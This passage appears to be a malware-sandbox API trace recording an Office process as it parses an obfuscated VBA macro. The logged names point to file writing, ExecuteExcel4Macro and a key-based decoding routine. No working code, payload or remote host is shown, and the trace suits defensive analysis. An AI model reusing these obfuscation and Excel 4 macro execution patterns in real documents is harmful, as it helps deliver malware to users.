szName="i") returned 0x101060 [0155.479] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o") returned 0x101066 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d") returned 0x10105b [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ofile") returned 0x101982 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CreateObject") returned 0x108af8 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o") returned 0x101066 [0155.479] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="o" | out: _Dst="o") returned 0x0 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xoAOvMNPSVo") returned 0x109ebf [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mykk") returned 0x1097c3 [0155.479] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AC") returned 0x105c7d [0155.480] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa19dd20, cb=0x400) returned 0x7cf4080 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dd") returned 0x105ced [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dd") returned 0x105ced [0155.480] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="dd" | out: _Dst="dd") returned 0x0 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lkd") returned 0x10aecd [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hMqirSfTAmm") returned 0x10c3fe [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="o") returned 0x101066 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ofile") returned 0x101982 [0155.480] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CreateTextFile") returned 0x10bd86 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dd") returned 0x105ced [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteLine") returned 0x10c965 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lkd") returned 0x10aecd [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lkd") returned 0x10aecd [0155.481] atoi (_Str="1") returned 1 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="func") returned 0x10305a [0155.481] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="func") returned 0x10305a [0155.482] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="func" | out: _Dst="func") returned 0x0 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lib") returned 0x10ae81 [0155.482] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Lib", cchCount1=-1, lpString2="lib", cchCount2=-1) returned 2 [0155.482] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="lib" | out: _Dst="lib") returned 0x0 [0155.482] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="lib" | out: _Dst="lib") returned 0x0 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lib") returned 0x10ae81 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lib") returned 0x10ae81 [0155.482] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="lib" | out: _Dst="lib") returned 0x0 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.482] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ok") returned 0x105e8b [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ok") returned 0x105e8b [0155.483] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="ok" | out: _Dst="ok") returned 0x0 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="go") returned 0x105d67 [0155.483] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Go", cchCount1=-1, lpString2="go", cchCount2=-1) returned 2 [0155.483] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="go" | out: _Dst="go") returned 0x0 [0155.483] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="go" | out: _Dst="go") returned 0x0 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="go") returned 0x105d67 [0155.483] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.484] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="goo") returned 0x1094af [0155.484] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x63a0000 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="goo") returned 0x1094af [0155.485] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="goo" | out: _Dst="goo") returned 0x0 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.485] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7cf4080, cb=0x800) returned 0x99f11a0 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ofile") returned 0x101982 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CreateTextFile") returned 0x10bd86 [0155.485] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WriteLine") returned 0x10c965 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="goo") returned 0x1094af [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WText") returned 0x10d2e8 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lets") returned 0x107dea [0155.486] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7ae6330, cb=0x400) returned 0x7cf4080 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lets") returned 0x107dea [0155.486] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="lets" | out: _Dst="lets") returned 0x0 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Application") returned 0x102aa5 [0155.486] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExecuteExcel4Macro") returned 0x104fc8 [0155.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.487] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="func") returned 0x10305a [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lib") returned 0x10ae81 [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ok") returned 0x105e8b [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lets") returned 0x107dea [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="go") returned 0x105d67 [0155.488] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="go" | out: _Dst="go") returned 0x0 [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.488] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Application") returned 0x102aa5 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExecuteExcel4Macro") returned 0x104fc8 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="func") returned 0x10305a [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lib") returned 0x10ae81 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ok") returned 0x105e8b [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="go") returned 0x105d67 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d") returned 0x10105b [0155.489] IMalloc:Realloc (This=0x7fefecb5380, pv=0x99f11a0, cb=0x1000) returned 0x961eb70 [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0155.489] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xoAOvMNPSVo") returned 0x109ebf [0155.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e96, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0155.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732e96, cbMultiByte=11, lpWideCharStr=0x9c33418, cchWideChar=11 | out: lpWideCharStr="xoAOvMNPSVo") returned 11 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yy") returned 0x105f73 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="msg") returned 0x10b551 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="outre") returned 0x10ea71 [0155.490] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UBound", cchCount1=-1, lpString2="outre", cchCount2=-1) returned 3 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.490] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.491] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="a" | out: _Dst="a") returned 0x0 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Split") returned 0x10298d [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="msg") returned 0x10b551 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="msg_len") returned 0x10dae9 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="x") returned 0x10106f [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.491] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="x") returned 0x10106f [0155.491] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="x" | out: _Dst="x") returned 0x0 [0155.491] atoi (_Str="0") returned 0 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="msg_len") returned 0x10dae9 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="key_a") returned 0x104f15 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yy") returned 0x105f73 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.492] atoi (_Str="1") returned 1 [0155.492] atoi (_Str="1") returned 1 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.492] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="intCoun" | out: _Dst="intCoun") returned 0x0 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yy") returned 0x105f73 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0155.492] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.493] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="intCoun" | out: _Dst="intCoun") returned 0x0 [0155.493] atoi (_Str="0") returned 0 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="key_a") returned 0x104f15 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yy") returned 0x105f73 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.493] atoi (_Str="1") returned 1 [0155.493] atoi (_Str="1") returned 1 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.493] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="intCoun" | out: _Dst="intCoun") returned 0x0 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="intCoun") returned 0x105623 [0155.493] atoi (_Str="1") returned 1 [0155.493] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ll") returned 0x105e1d [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ll") returned 0x105e1d [0155.494] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="ll" | out: _Dst="ll") returned 0x0 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Replace") returned 0x100e66 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="x") returned 0x10106f [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fg") returned 0x105d3a [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ll") returned 0x105e1d [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Asc") returned 0x107521 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="key_a") returned 0x104f15 [0155.494] atoi (_Str="256") returned 256 [0155.494] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0155.494] atoi (_Str="256") returned 256 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="gdd_a") returned 0x10e717 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fg") returned 0x105d3a [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="outre") returned 0x10ea71 [0155.495] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UBound", cchCount1=-1, lpString2="outre", cchCount2=-1) returned 3 [0155.495] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="outre" | out: _Dst="outre") returned 0x0 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="outre") returned 0x10ea71 [0155.495] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UBound", cchCount1=-1, lpString2="outre", cchCount2=-1) returned 3 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="gdd_a") returned 0x10e717 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xoAOvMNPSVo") returned 0x109ebf [0155.495] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="xoAOvMNPSVo" | out: _Dst="xoAOvMNPSVo") returned 0x0 [0155.495] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="outre") returned 0x10ea71 [0155.495] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UBound", cchCount1=-1, lpString2="outre", cchCount2=-1) returned 3 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hMqirSfTAmm") returned 0x10c3fe [0155.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f0a, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0155.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732f0a, cbMultiByte=11, lpWideCharStr=0x9c33418, cchWideChar=11 | out: lpWideCharStr="hMqirSfTAmm") returned 11 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ss") returned 0x105f27 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="brt") returned 0x107a66 [0155.496] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stringlen") returned 0x10bc58 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="resOut") returned 0x1053ac [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="grpBegin") returned 0x10bc16 [0155.497] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7cf4080, cb=0x800) returned 0x99f11a0 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stringlen") returned 0x10bc58 [0155.497] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="stringlen" | out: _Dst="stringlen") returned 0x0 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ss") returned 0x105f27 [0155.497] atoi (_Str="1") returned 1 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="newstring") returned 0x102be1 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ss") returned 0x105f27 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stringlen") returned 0x10bc58 [0155.497] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.498] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="grpBegin" | out: _Dst="grpBegin") returned 0x0 [0155.498] atoi (_Str="1") returned 1 [0155.498] atoi (_Str="4") returned 4 [0155.498] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="numDataBytes" | out: _Dst="numDataBytes") returned 0x0 [0155.498] atoi (_Str="3") returned 3 [0155.498] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="nGcount" | out: _Dst="nGcount") returned 0x0 [0155.498] atoi (_Str="0") returned 0 [0155.498] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="CharCounter" | out: _Dst="CharCounter") returned 0x0 [0155.498] atoi (_Str="0") returned 0 [0155.498] atoi (_Str="3") returned 3 [0155.498] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="Oo" | out: _Dst="Oo") returned 0x0 [0155.498] atoi (_Str="1") returned 1 [0155.499] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="Oo" | out: _Dst="Oo") returned 0x0 [0155.499] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="numDataBytes" | out: _Dst="numDataBytes") returned 0x0 [0155.499] atoi (_Str="1") returned 1 [0155.499] CExposedStream::Read () returned 0x0 [0155.499] CExposedStream::Read () returned 0x0 [0155.499] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="Pp" | out: _Dst="Pp") returned 0x0 [0155.499] atoi (_Str="0") returned 0 [0155.499] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="Pp" | out: _Dst="Pp") returned 0x0 [0155.499] atoi (_Str="1") returned 1 [0155.499] atoi (_Str="1") returned 1 [0155.500] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="tr" | out: _Dst="tr") returned 0x0 [0155.500] atoi (_Str="64") returned 64 [0155.500] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="nGcount" | out: _Dst="nGcount") returned 0x0 [0155.500] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="nGcount" | out: _Dst="nGcount") returned 0x0 [0155.500] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="ds" | out: _Dst="ds") returned 0x0 [0155.500] atoi (_Str="6") returned 6 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="nGcount" | out: _Dst="nGcount") returned 0x0 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="po" | out: _Dst="po") returned 0x0 [0155.501] atoi (_Str="1") returned 1 [0155.501] atoi (_Str="2") returned 2 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="pOut" | out: _Dst="pOut") returned 0x0 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="pOut" | out: _Dst="pOut") returned 0x0 [0155.501] atoi (_Str="3") returned 3 [0155.501] atoi (_Str="2") returned 2 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="pOut" | out: _Dst="pOut") returned 0x0 [0155.501] atoi (_Str="5") returned 5 [0155.501] atoi (_Str="2") returned 2 [0155.501] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="resOut" | out: _Dst="resOut") returned 0x0 [0155.502] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="hMqirSfTAmm" | out: _Dst="hMqirSfTAmm") returned 0x0 [0155.502] CExposedStream::Read () returned 0x0 [0155.502] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1dba50, cb=0x78c) returned 0xa1dba50 [0155.502] CExposedStream::Release () returned 0x1 [0155.502] CExposedStream::Release () returned 0x0 [0155.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1cf9d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0155.502] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1cfb10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0155.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.503] IMalloc:Realloc (This=0x7fefecb5380, pv=0x7f0a2e0, cb=0x18) returned 0x7f05340 [0155.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93b70 [0155.503] IMalloc:GetSize (This=0x7fefecb5380, pv=0x9c93b70) returned 0x80 [0155.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1750 [0155.503] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1810 [0155.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1cf9d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0155.503] CoCreateGuid (in: pguid=0x1cf700 | out: pguid=0x1cf700*(Data1=0x9d59d022, Data2=0x915, Data3=0x488f, Data4=([0]=0x9b, [1]=0x69, [2]=0x77, [3]=0x68, [4]=0x3a, [5]=0xfa, [6]=0xc6, [7]=0x52))) returned 0x0 [0155.503] CoCreateGuid (in: pguid=0x1cf710 | out: pguid=0x1cf710*(Data1=0xb87b0f95, Data2=0x1fdb, Data3=0x4879, Data4=([0]=0xac, [1]=0x91, [2]=0xd4, [3]=0x89, [4]=0xdf, [5]=0x73, [6]=0x41, [7]=0xb0))) returned 0x0 [0155.503] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sheet1", cchWideChar=7, lpMultiByteStr=0x1cf720, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sheet1", lpUsedDefaultChar=0x0) returned 7 [0155.503] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheet1") returned 0x101ae8 [0155.503] GetLocalTime (in: lpSystemTime=0x1cf5f8 | out: lpSystemTime=0x1cf5f8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x392)) [0155.503] _ultow_s (in: _Value=0x6078a635, _Buffer=0xa14bad4, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a635") returned 0x0 [0155.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="036078a635", cchWideChar=11, lpMultiByteStr=0x1cf590, cbMultiByte=22, lpDefaultChar=0x0, 